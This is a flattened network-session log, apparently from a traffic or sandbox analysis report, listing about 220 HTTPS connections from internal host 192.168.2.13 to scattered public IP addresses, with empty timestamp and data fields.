                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20832192.168.2.135530669.59.97.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20833192.168.2.134482038.229.69.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20834192.168.2.133891439.9.129.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20835192.168.2.1360290129.122.15.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20836192.168.2.1356182109.165.107.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20837192.168.2.136038213.233.240.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20838192.168.2.1347650145.165.5.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20839192.168.2.135620618.161.2.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20840192.168.2.1357146137.190.216.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20841192.168.2.1334546105.148.109.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20842192.168.2.1339500123.248.96.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20843192.168.2.1351262121.27.54.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20844192.168.2.134870477.221.144.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20845192.168.2.1335940123.119.248.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20846192.168.2.135580269.157.134.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20847192.168.2.1348650144.87.209.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20848192.168.2.1348644104.232.251.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20849192.168.2.134671038.193.117.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20850192.168.2.1345626223.53.133.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20851192.168.2.135030419.138.134.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20852192.168.2.134769027.48.166.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20853192.168.2.1334836102.62.165.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20854192.168.2.134615678.182.3.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20855192.168.2.1333452208.139.197.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20856192.168.2.1360584146.236.66.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20857192.168.2.135988891.236.55.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20858192.168.2.135434820.252.34.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20859192.168.2.1357416207.99.159.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20860192.168.2.1360988129.180.29.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20861192.168.2.1359874210.52.70.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20862192.168.2.1349664102.29.145.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20863192.168.2.1344942192.124.171.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20864192.168.2.1339966223.250.219.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20865192.168.2.1338446165.211.238.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20866192.168.2.135601047.189.249.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20867192.168.2.1359324143.84.189.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20868192.168.2.1343902175.194.44.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20869192.168.2.134732893.110.106.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20870192.168.2.1343698180.69.214.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20871192.168.2.1344478199.147.145.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20872192.168.2.133806824.52.130.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20873192.168.2.1353972178.143.14.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20874192.168.2.1358000150.76.30.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20875192.168.2.134752459.135.177.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20876192.168.2.134499023.16.86.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20877192.168.2.1347852184.225.166.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20878192.168.2.135269427.203.177.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20879192.168.2.1354366216.54.67.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20880192.168.2.134374662.234.190.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20881192.168.2.136041236.212.7.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20882192.168.2.135619894.146.24.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20883192.168.2.1360942206.14.228.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20884192.168.2.1341236196.100.105.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20885192.168.2.134043412.177.140.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20886192.168.2.133856273.62.188.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20887192.168.2.135567624.16.243.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20888192.168.2.134702673.157.153.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20889192.168.2.1344328172.173.162.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20890192.168.2.1341348155.210.141.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20891192.168.2.1356210149.213.178.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20892192.168.2.1352356148.208.162.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20893192.168.2.135528624.57.5.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20894192.168.2.1334644161.14.62.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20895192.168.2.1354496167.30.135.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20896192.168.2.135544623.236.54.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20897192.168.2.133778491.250.242.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20898192.168.2.1356980144.74.68.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20899192.168.2.1360518134.231.108.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20900192.168.2.1351546168.102.245.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20901192.168.2.134292259.134.114.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20902192.168.2.135276234.84.134.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20903192.168.2.1340170116.3.158.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20904192.168.2.1336924155.85.168.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20905192.168.2.1337924115.116.72.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20906192.168.2.134557894.174.218.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20907192.168.2.1350810116.225.4.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20908192.168.2.1360342167.62.28.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20909192.168.2.1347082208.5.184.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20910192.168.2.135232668.18.244.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20911192.168.2.135373251.238.138.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20912192.168.2.1350472131.222.182.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20913192.168.2.1359448117.70.129.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20914192.168.2.1335018186.61.72.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20915192.168.2.1351824210.183.54.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20916192.168.2.134674873.93.146.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20917192.168.2.1359242193.113.116.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20918192.168.2.1356988198.159.234.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20919192.168.2.1354586150.126.131.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20920192.168.2.1337496113.241.255.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20921192.168.2.1357998155.127.231.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20922192.168.2.1337876172.124.189.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20923192.168.2.1335738208.203.11.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20924192.168.2.134089687.176.213.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20925192.168.2.134319423.164.205.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20926192.168.2.1355244143.213.250.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20927192.168.2.1360810130.90.53.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20928192.168.2.136020244.53.98.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20929192.168.2.1358084178.140.167.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20930192.168.2.1353818120.187.27.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20931192.168.2.1346858147.38.217.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20932192.168.2.1356174221.206.220.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20933192.168.2.1342464212.184.23.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20934192.168.2.1336494116.209.35.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20935192.168.2.135959260.67.167.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20936192.168.2.1337204179.66.209.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20937192.168.2.13471628.15.227.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20938192.168.2.1354336161.196.200.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20939192.168.2.1350378113.206.9.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20940192.168.2.1340574148.63.54.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20941192.168.2.1346070199.136.123.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20942192.168.2.1339754164.160.55.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20943192.168.2.1335532190.151.130.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20944192.168.2.1348672170.152.9.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20945192.168.2.1356168177.255.54.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20946192.168.2.135645657.15.61.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20947192.168.2.1347460213.159.45.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20948192.168.2.135472283.238.140.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20949192.168.2.1343968110.175.232.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20950192.168.2.135807680.110.123.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20951192.168.2.1342006154.10.17.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20952192.168.2.1342104165.114.58.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20953192.168.2.1338776123.102.235.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20954192.168.2.1354260207.128.126.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20955192.168.2.1347900181.193.238.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20956192.168.2.1337054195.200.172.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20957192.168.2.133580090.244.155.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20958192.168.2.134273267.179.80.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20959192.168.2.1359968188.84.222.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20960192.168.2.1359220163.33.250.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20961192.168.2.13410289.246.97.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20962192.168.2.136023064.224.236.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20963192.168.2.134654638.97.60.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20964192.168.2.133742277.81.60.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20965192.168.2.136021247.90.216.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20966192.168.2.1341126176.17.124.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20967192.168.2.134941214.113.254.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20968192.168.2.1350210124.106.25.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20969192.168.2.1334572131.206.200.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20970192.168.2.135153299.226.207.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20971192.168.2.133801693.54.18.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20972192.168.2.133914624.30.50.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20973192.168.2.135977441.169.233.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20974192.168.2.134956271.63.139.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20975192.168.2.135403271.101.19.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20976192.168.2.1338058142.201.213.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20977192.168.2.1350126172.139.170.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20978192.168.2.1339180134.255.46.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20979192.168.2.1354214109.25.69.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20980192.168.2.1344984178.157.109.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20981192.168.2.1339990151.50.240.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20982192.168.2.134936060.226.227.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20983192.168.2.135728068.190.21.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20984192.168.2.1351810116.176.59.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20985192.168.2.1334832126.20.99.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20986192.168.2.1345988101.238.248.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20987192.168.2.1336762198.83.190.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20988192.168.2.133479270.73.9.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20989192.168.2.1340948103.244.241.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20990192.168.2.134554234.252.19.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20991192.168.2.135656842.230.27.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20992192.168.2.1349086201.167.15.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20993192.168.2.1351236136.56.149.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20994192.168.2.135746083.43.212.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20995192.168.2.1357980187.191.254.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20996192.168.2.135077062.207.235.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20997192.168.2.1337484142.67.8.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20998192.168.2.1360908178.234.136.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20999192.168.2.1356102169.50.195.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21000192.168.2.1352670161.28.177.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21001192.168.2.1344256155.81.220.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21002192.168.2.1351324197.114.186.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21003192.168.2.135527662.227.250.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21004192.168.2.1333330129.203.98.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21005192.168.2.1335146116.130.224.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21006192.168.2.1341330186.210.231.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21007192.168.2.1342786188.9.175.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21008192.168.2.1341476220.211.78.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21009192.168.2.134016237.228.128.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21010192.168.2.133864469.101.160.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21011192.168.2.1345858138.137.105.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21012192.168.2.1336106170.62.250.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21013192.168.2.13575844.254.93.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21014192.168.2.1352816101.170.116.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21015192.168.2.1348914194.58.195.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21016192.168.2.1355338151.20.107.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21017192.168.2.1359590160.202.184.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21018192.168.2.133723664.13.251.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21019192.168.2.133976669.19.245.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21020192.168.2.1356362211.7.209.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21021192.168.2.1348720138.45.34.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21022192.168.2.1333572137.188.238.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21023192.168.2.1356328199.47.231.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21024192.168.2.1347800135.158.80.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21025192.168.2.1336792161.126.244.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21026192.168.2.1356396121.47.127.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21027192.168.2.1337906199.76.170.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21028192.168.2.1343556156.31.123.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21029192.168.2.1345518208.138.226.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21030192.168.2.135605472.164.47.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21031192.168.2.1345284159.0.128.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21032192.168.2.134323844.86.173.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21033192.168.2.1334744204.93.75.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21034192.168.2.135962270.218.116.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21035192.168.2.133288012.23.17.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21036192.168.2.1350074202.34.140.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21037192.168.2.134878672.232.64.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21038192.168.2.135058688.206.8.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21039192.168.2.1336606136.83.91.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21040192.168.2.1351334207.107.174.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21041192.168.2.1349292200.161.135.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21042192.168.2.1340944129.34.233.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21043192.168.2.1357798139.174.140.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21044192.168.2.1357480166.102.54.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21045192.168.2.1335052113.229.206.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21046192.168.2.1354004205.86.230.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21047192.168.2.133890657.24.252.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21048192.168.2.1354912173.229.151.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21049192.168.2.135004861.167.43.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21050192.168.2.1349946163.110.250.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21051192.168.2.1346640120.190.136.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21052192.168.2.1343620124.34.85.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21053192.168.2.1356252119.212.252.144443
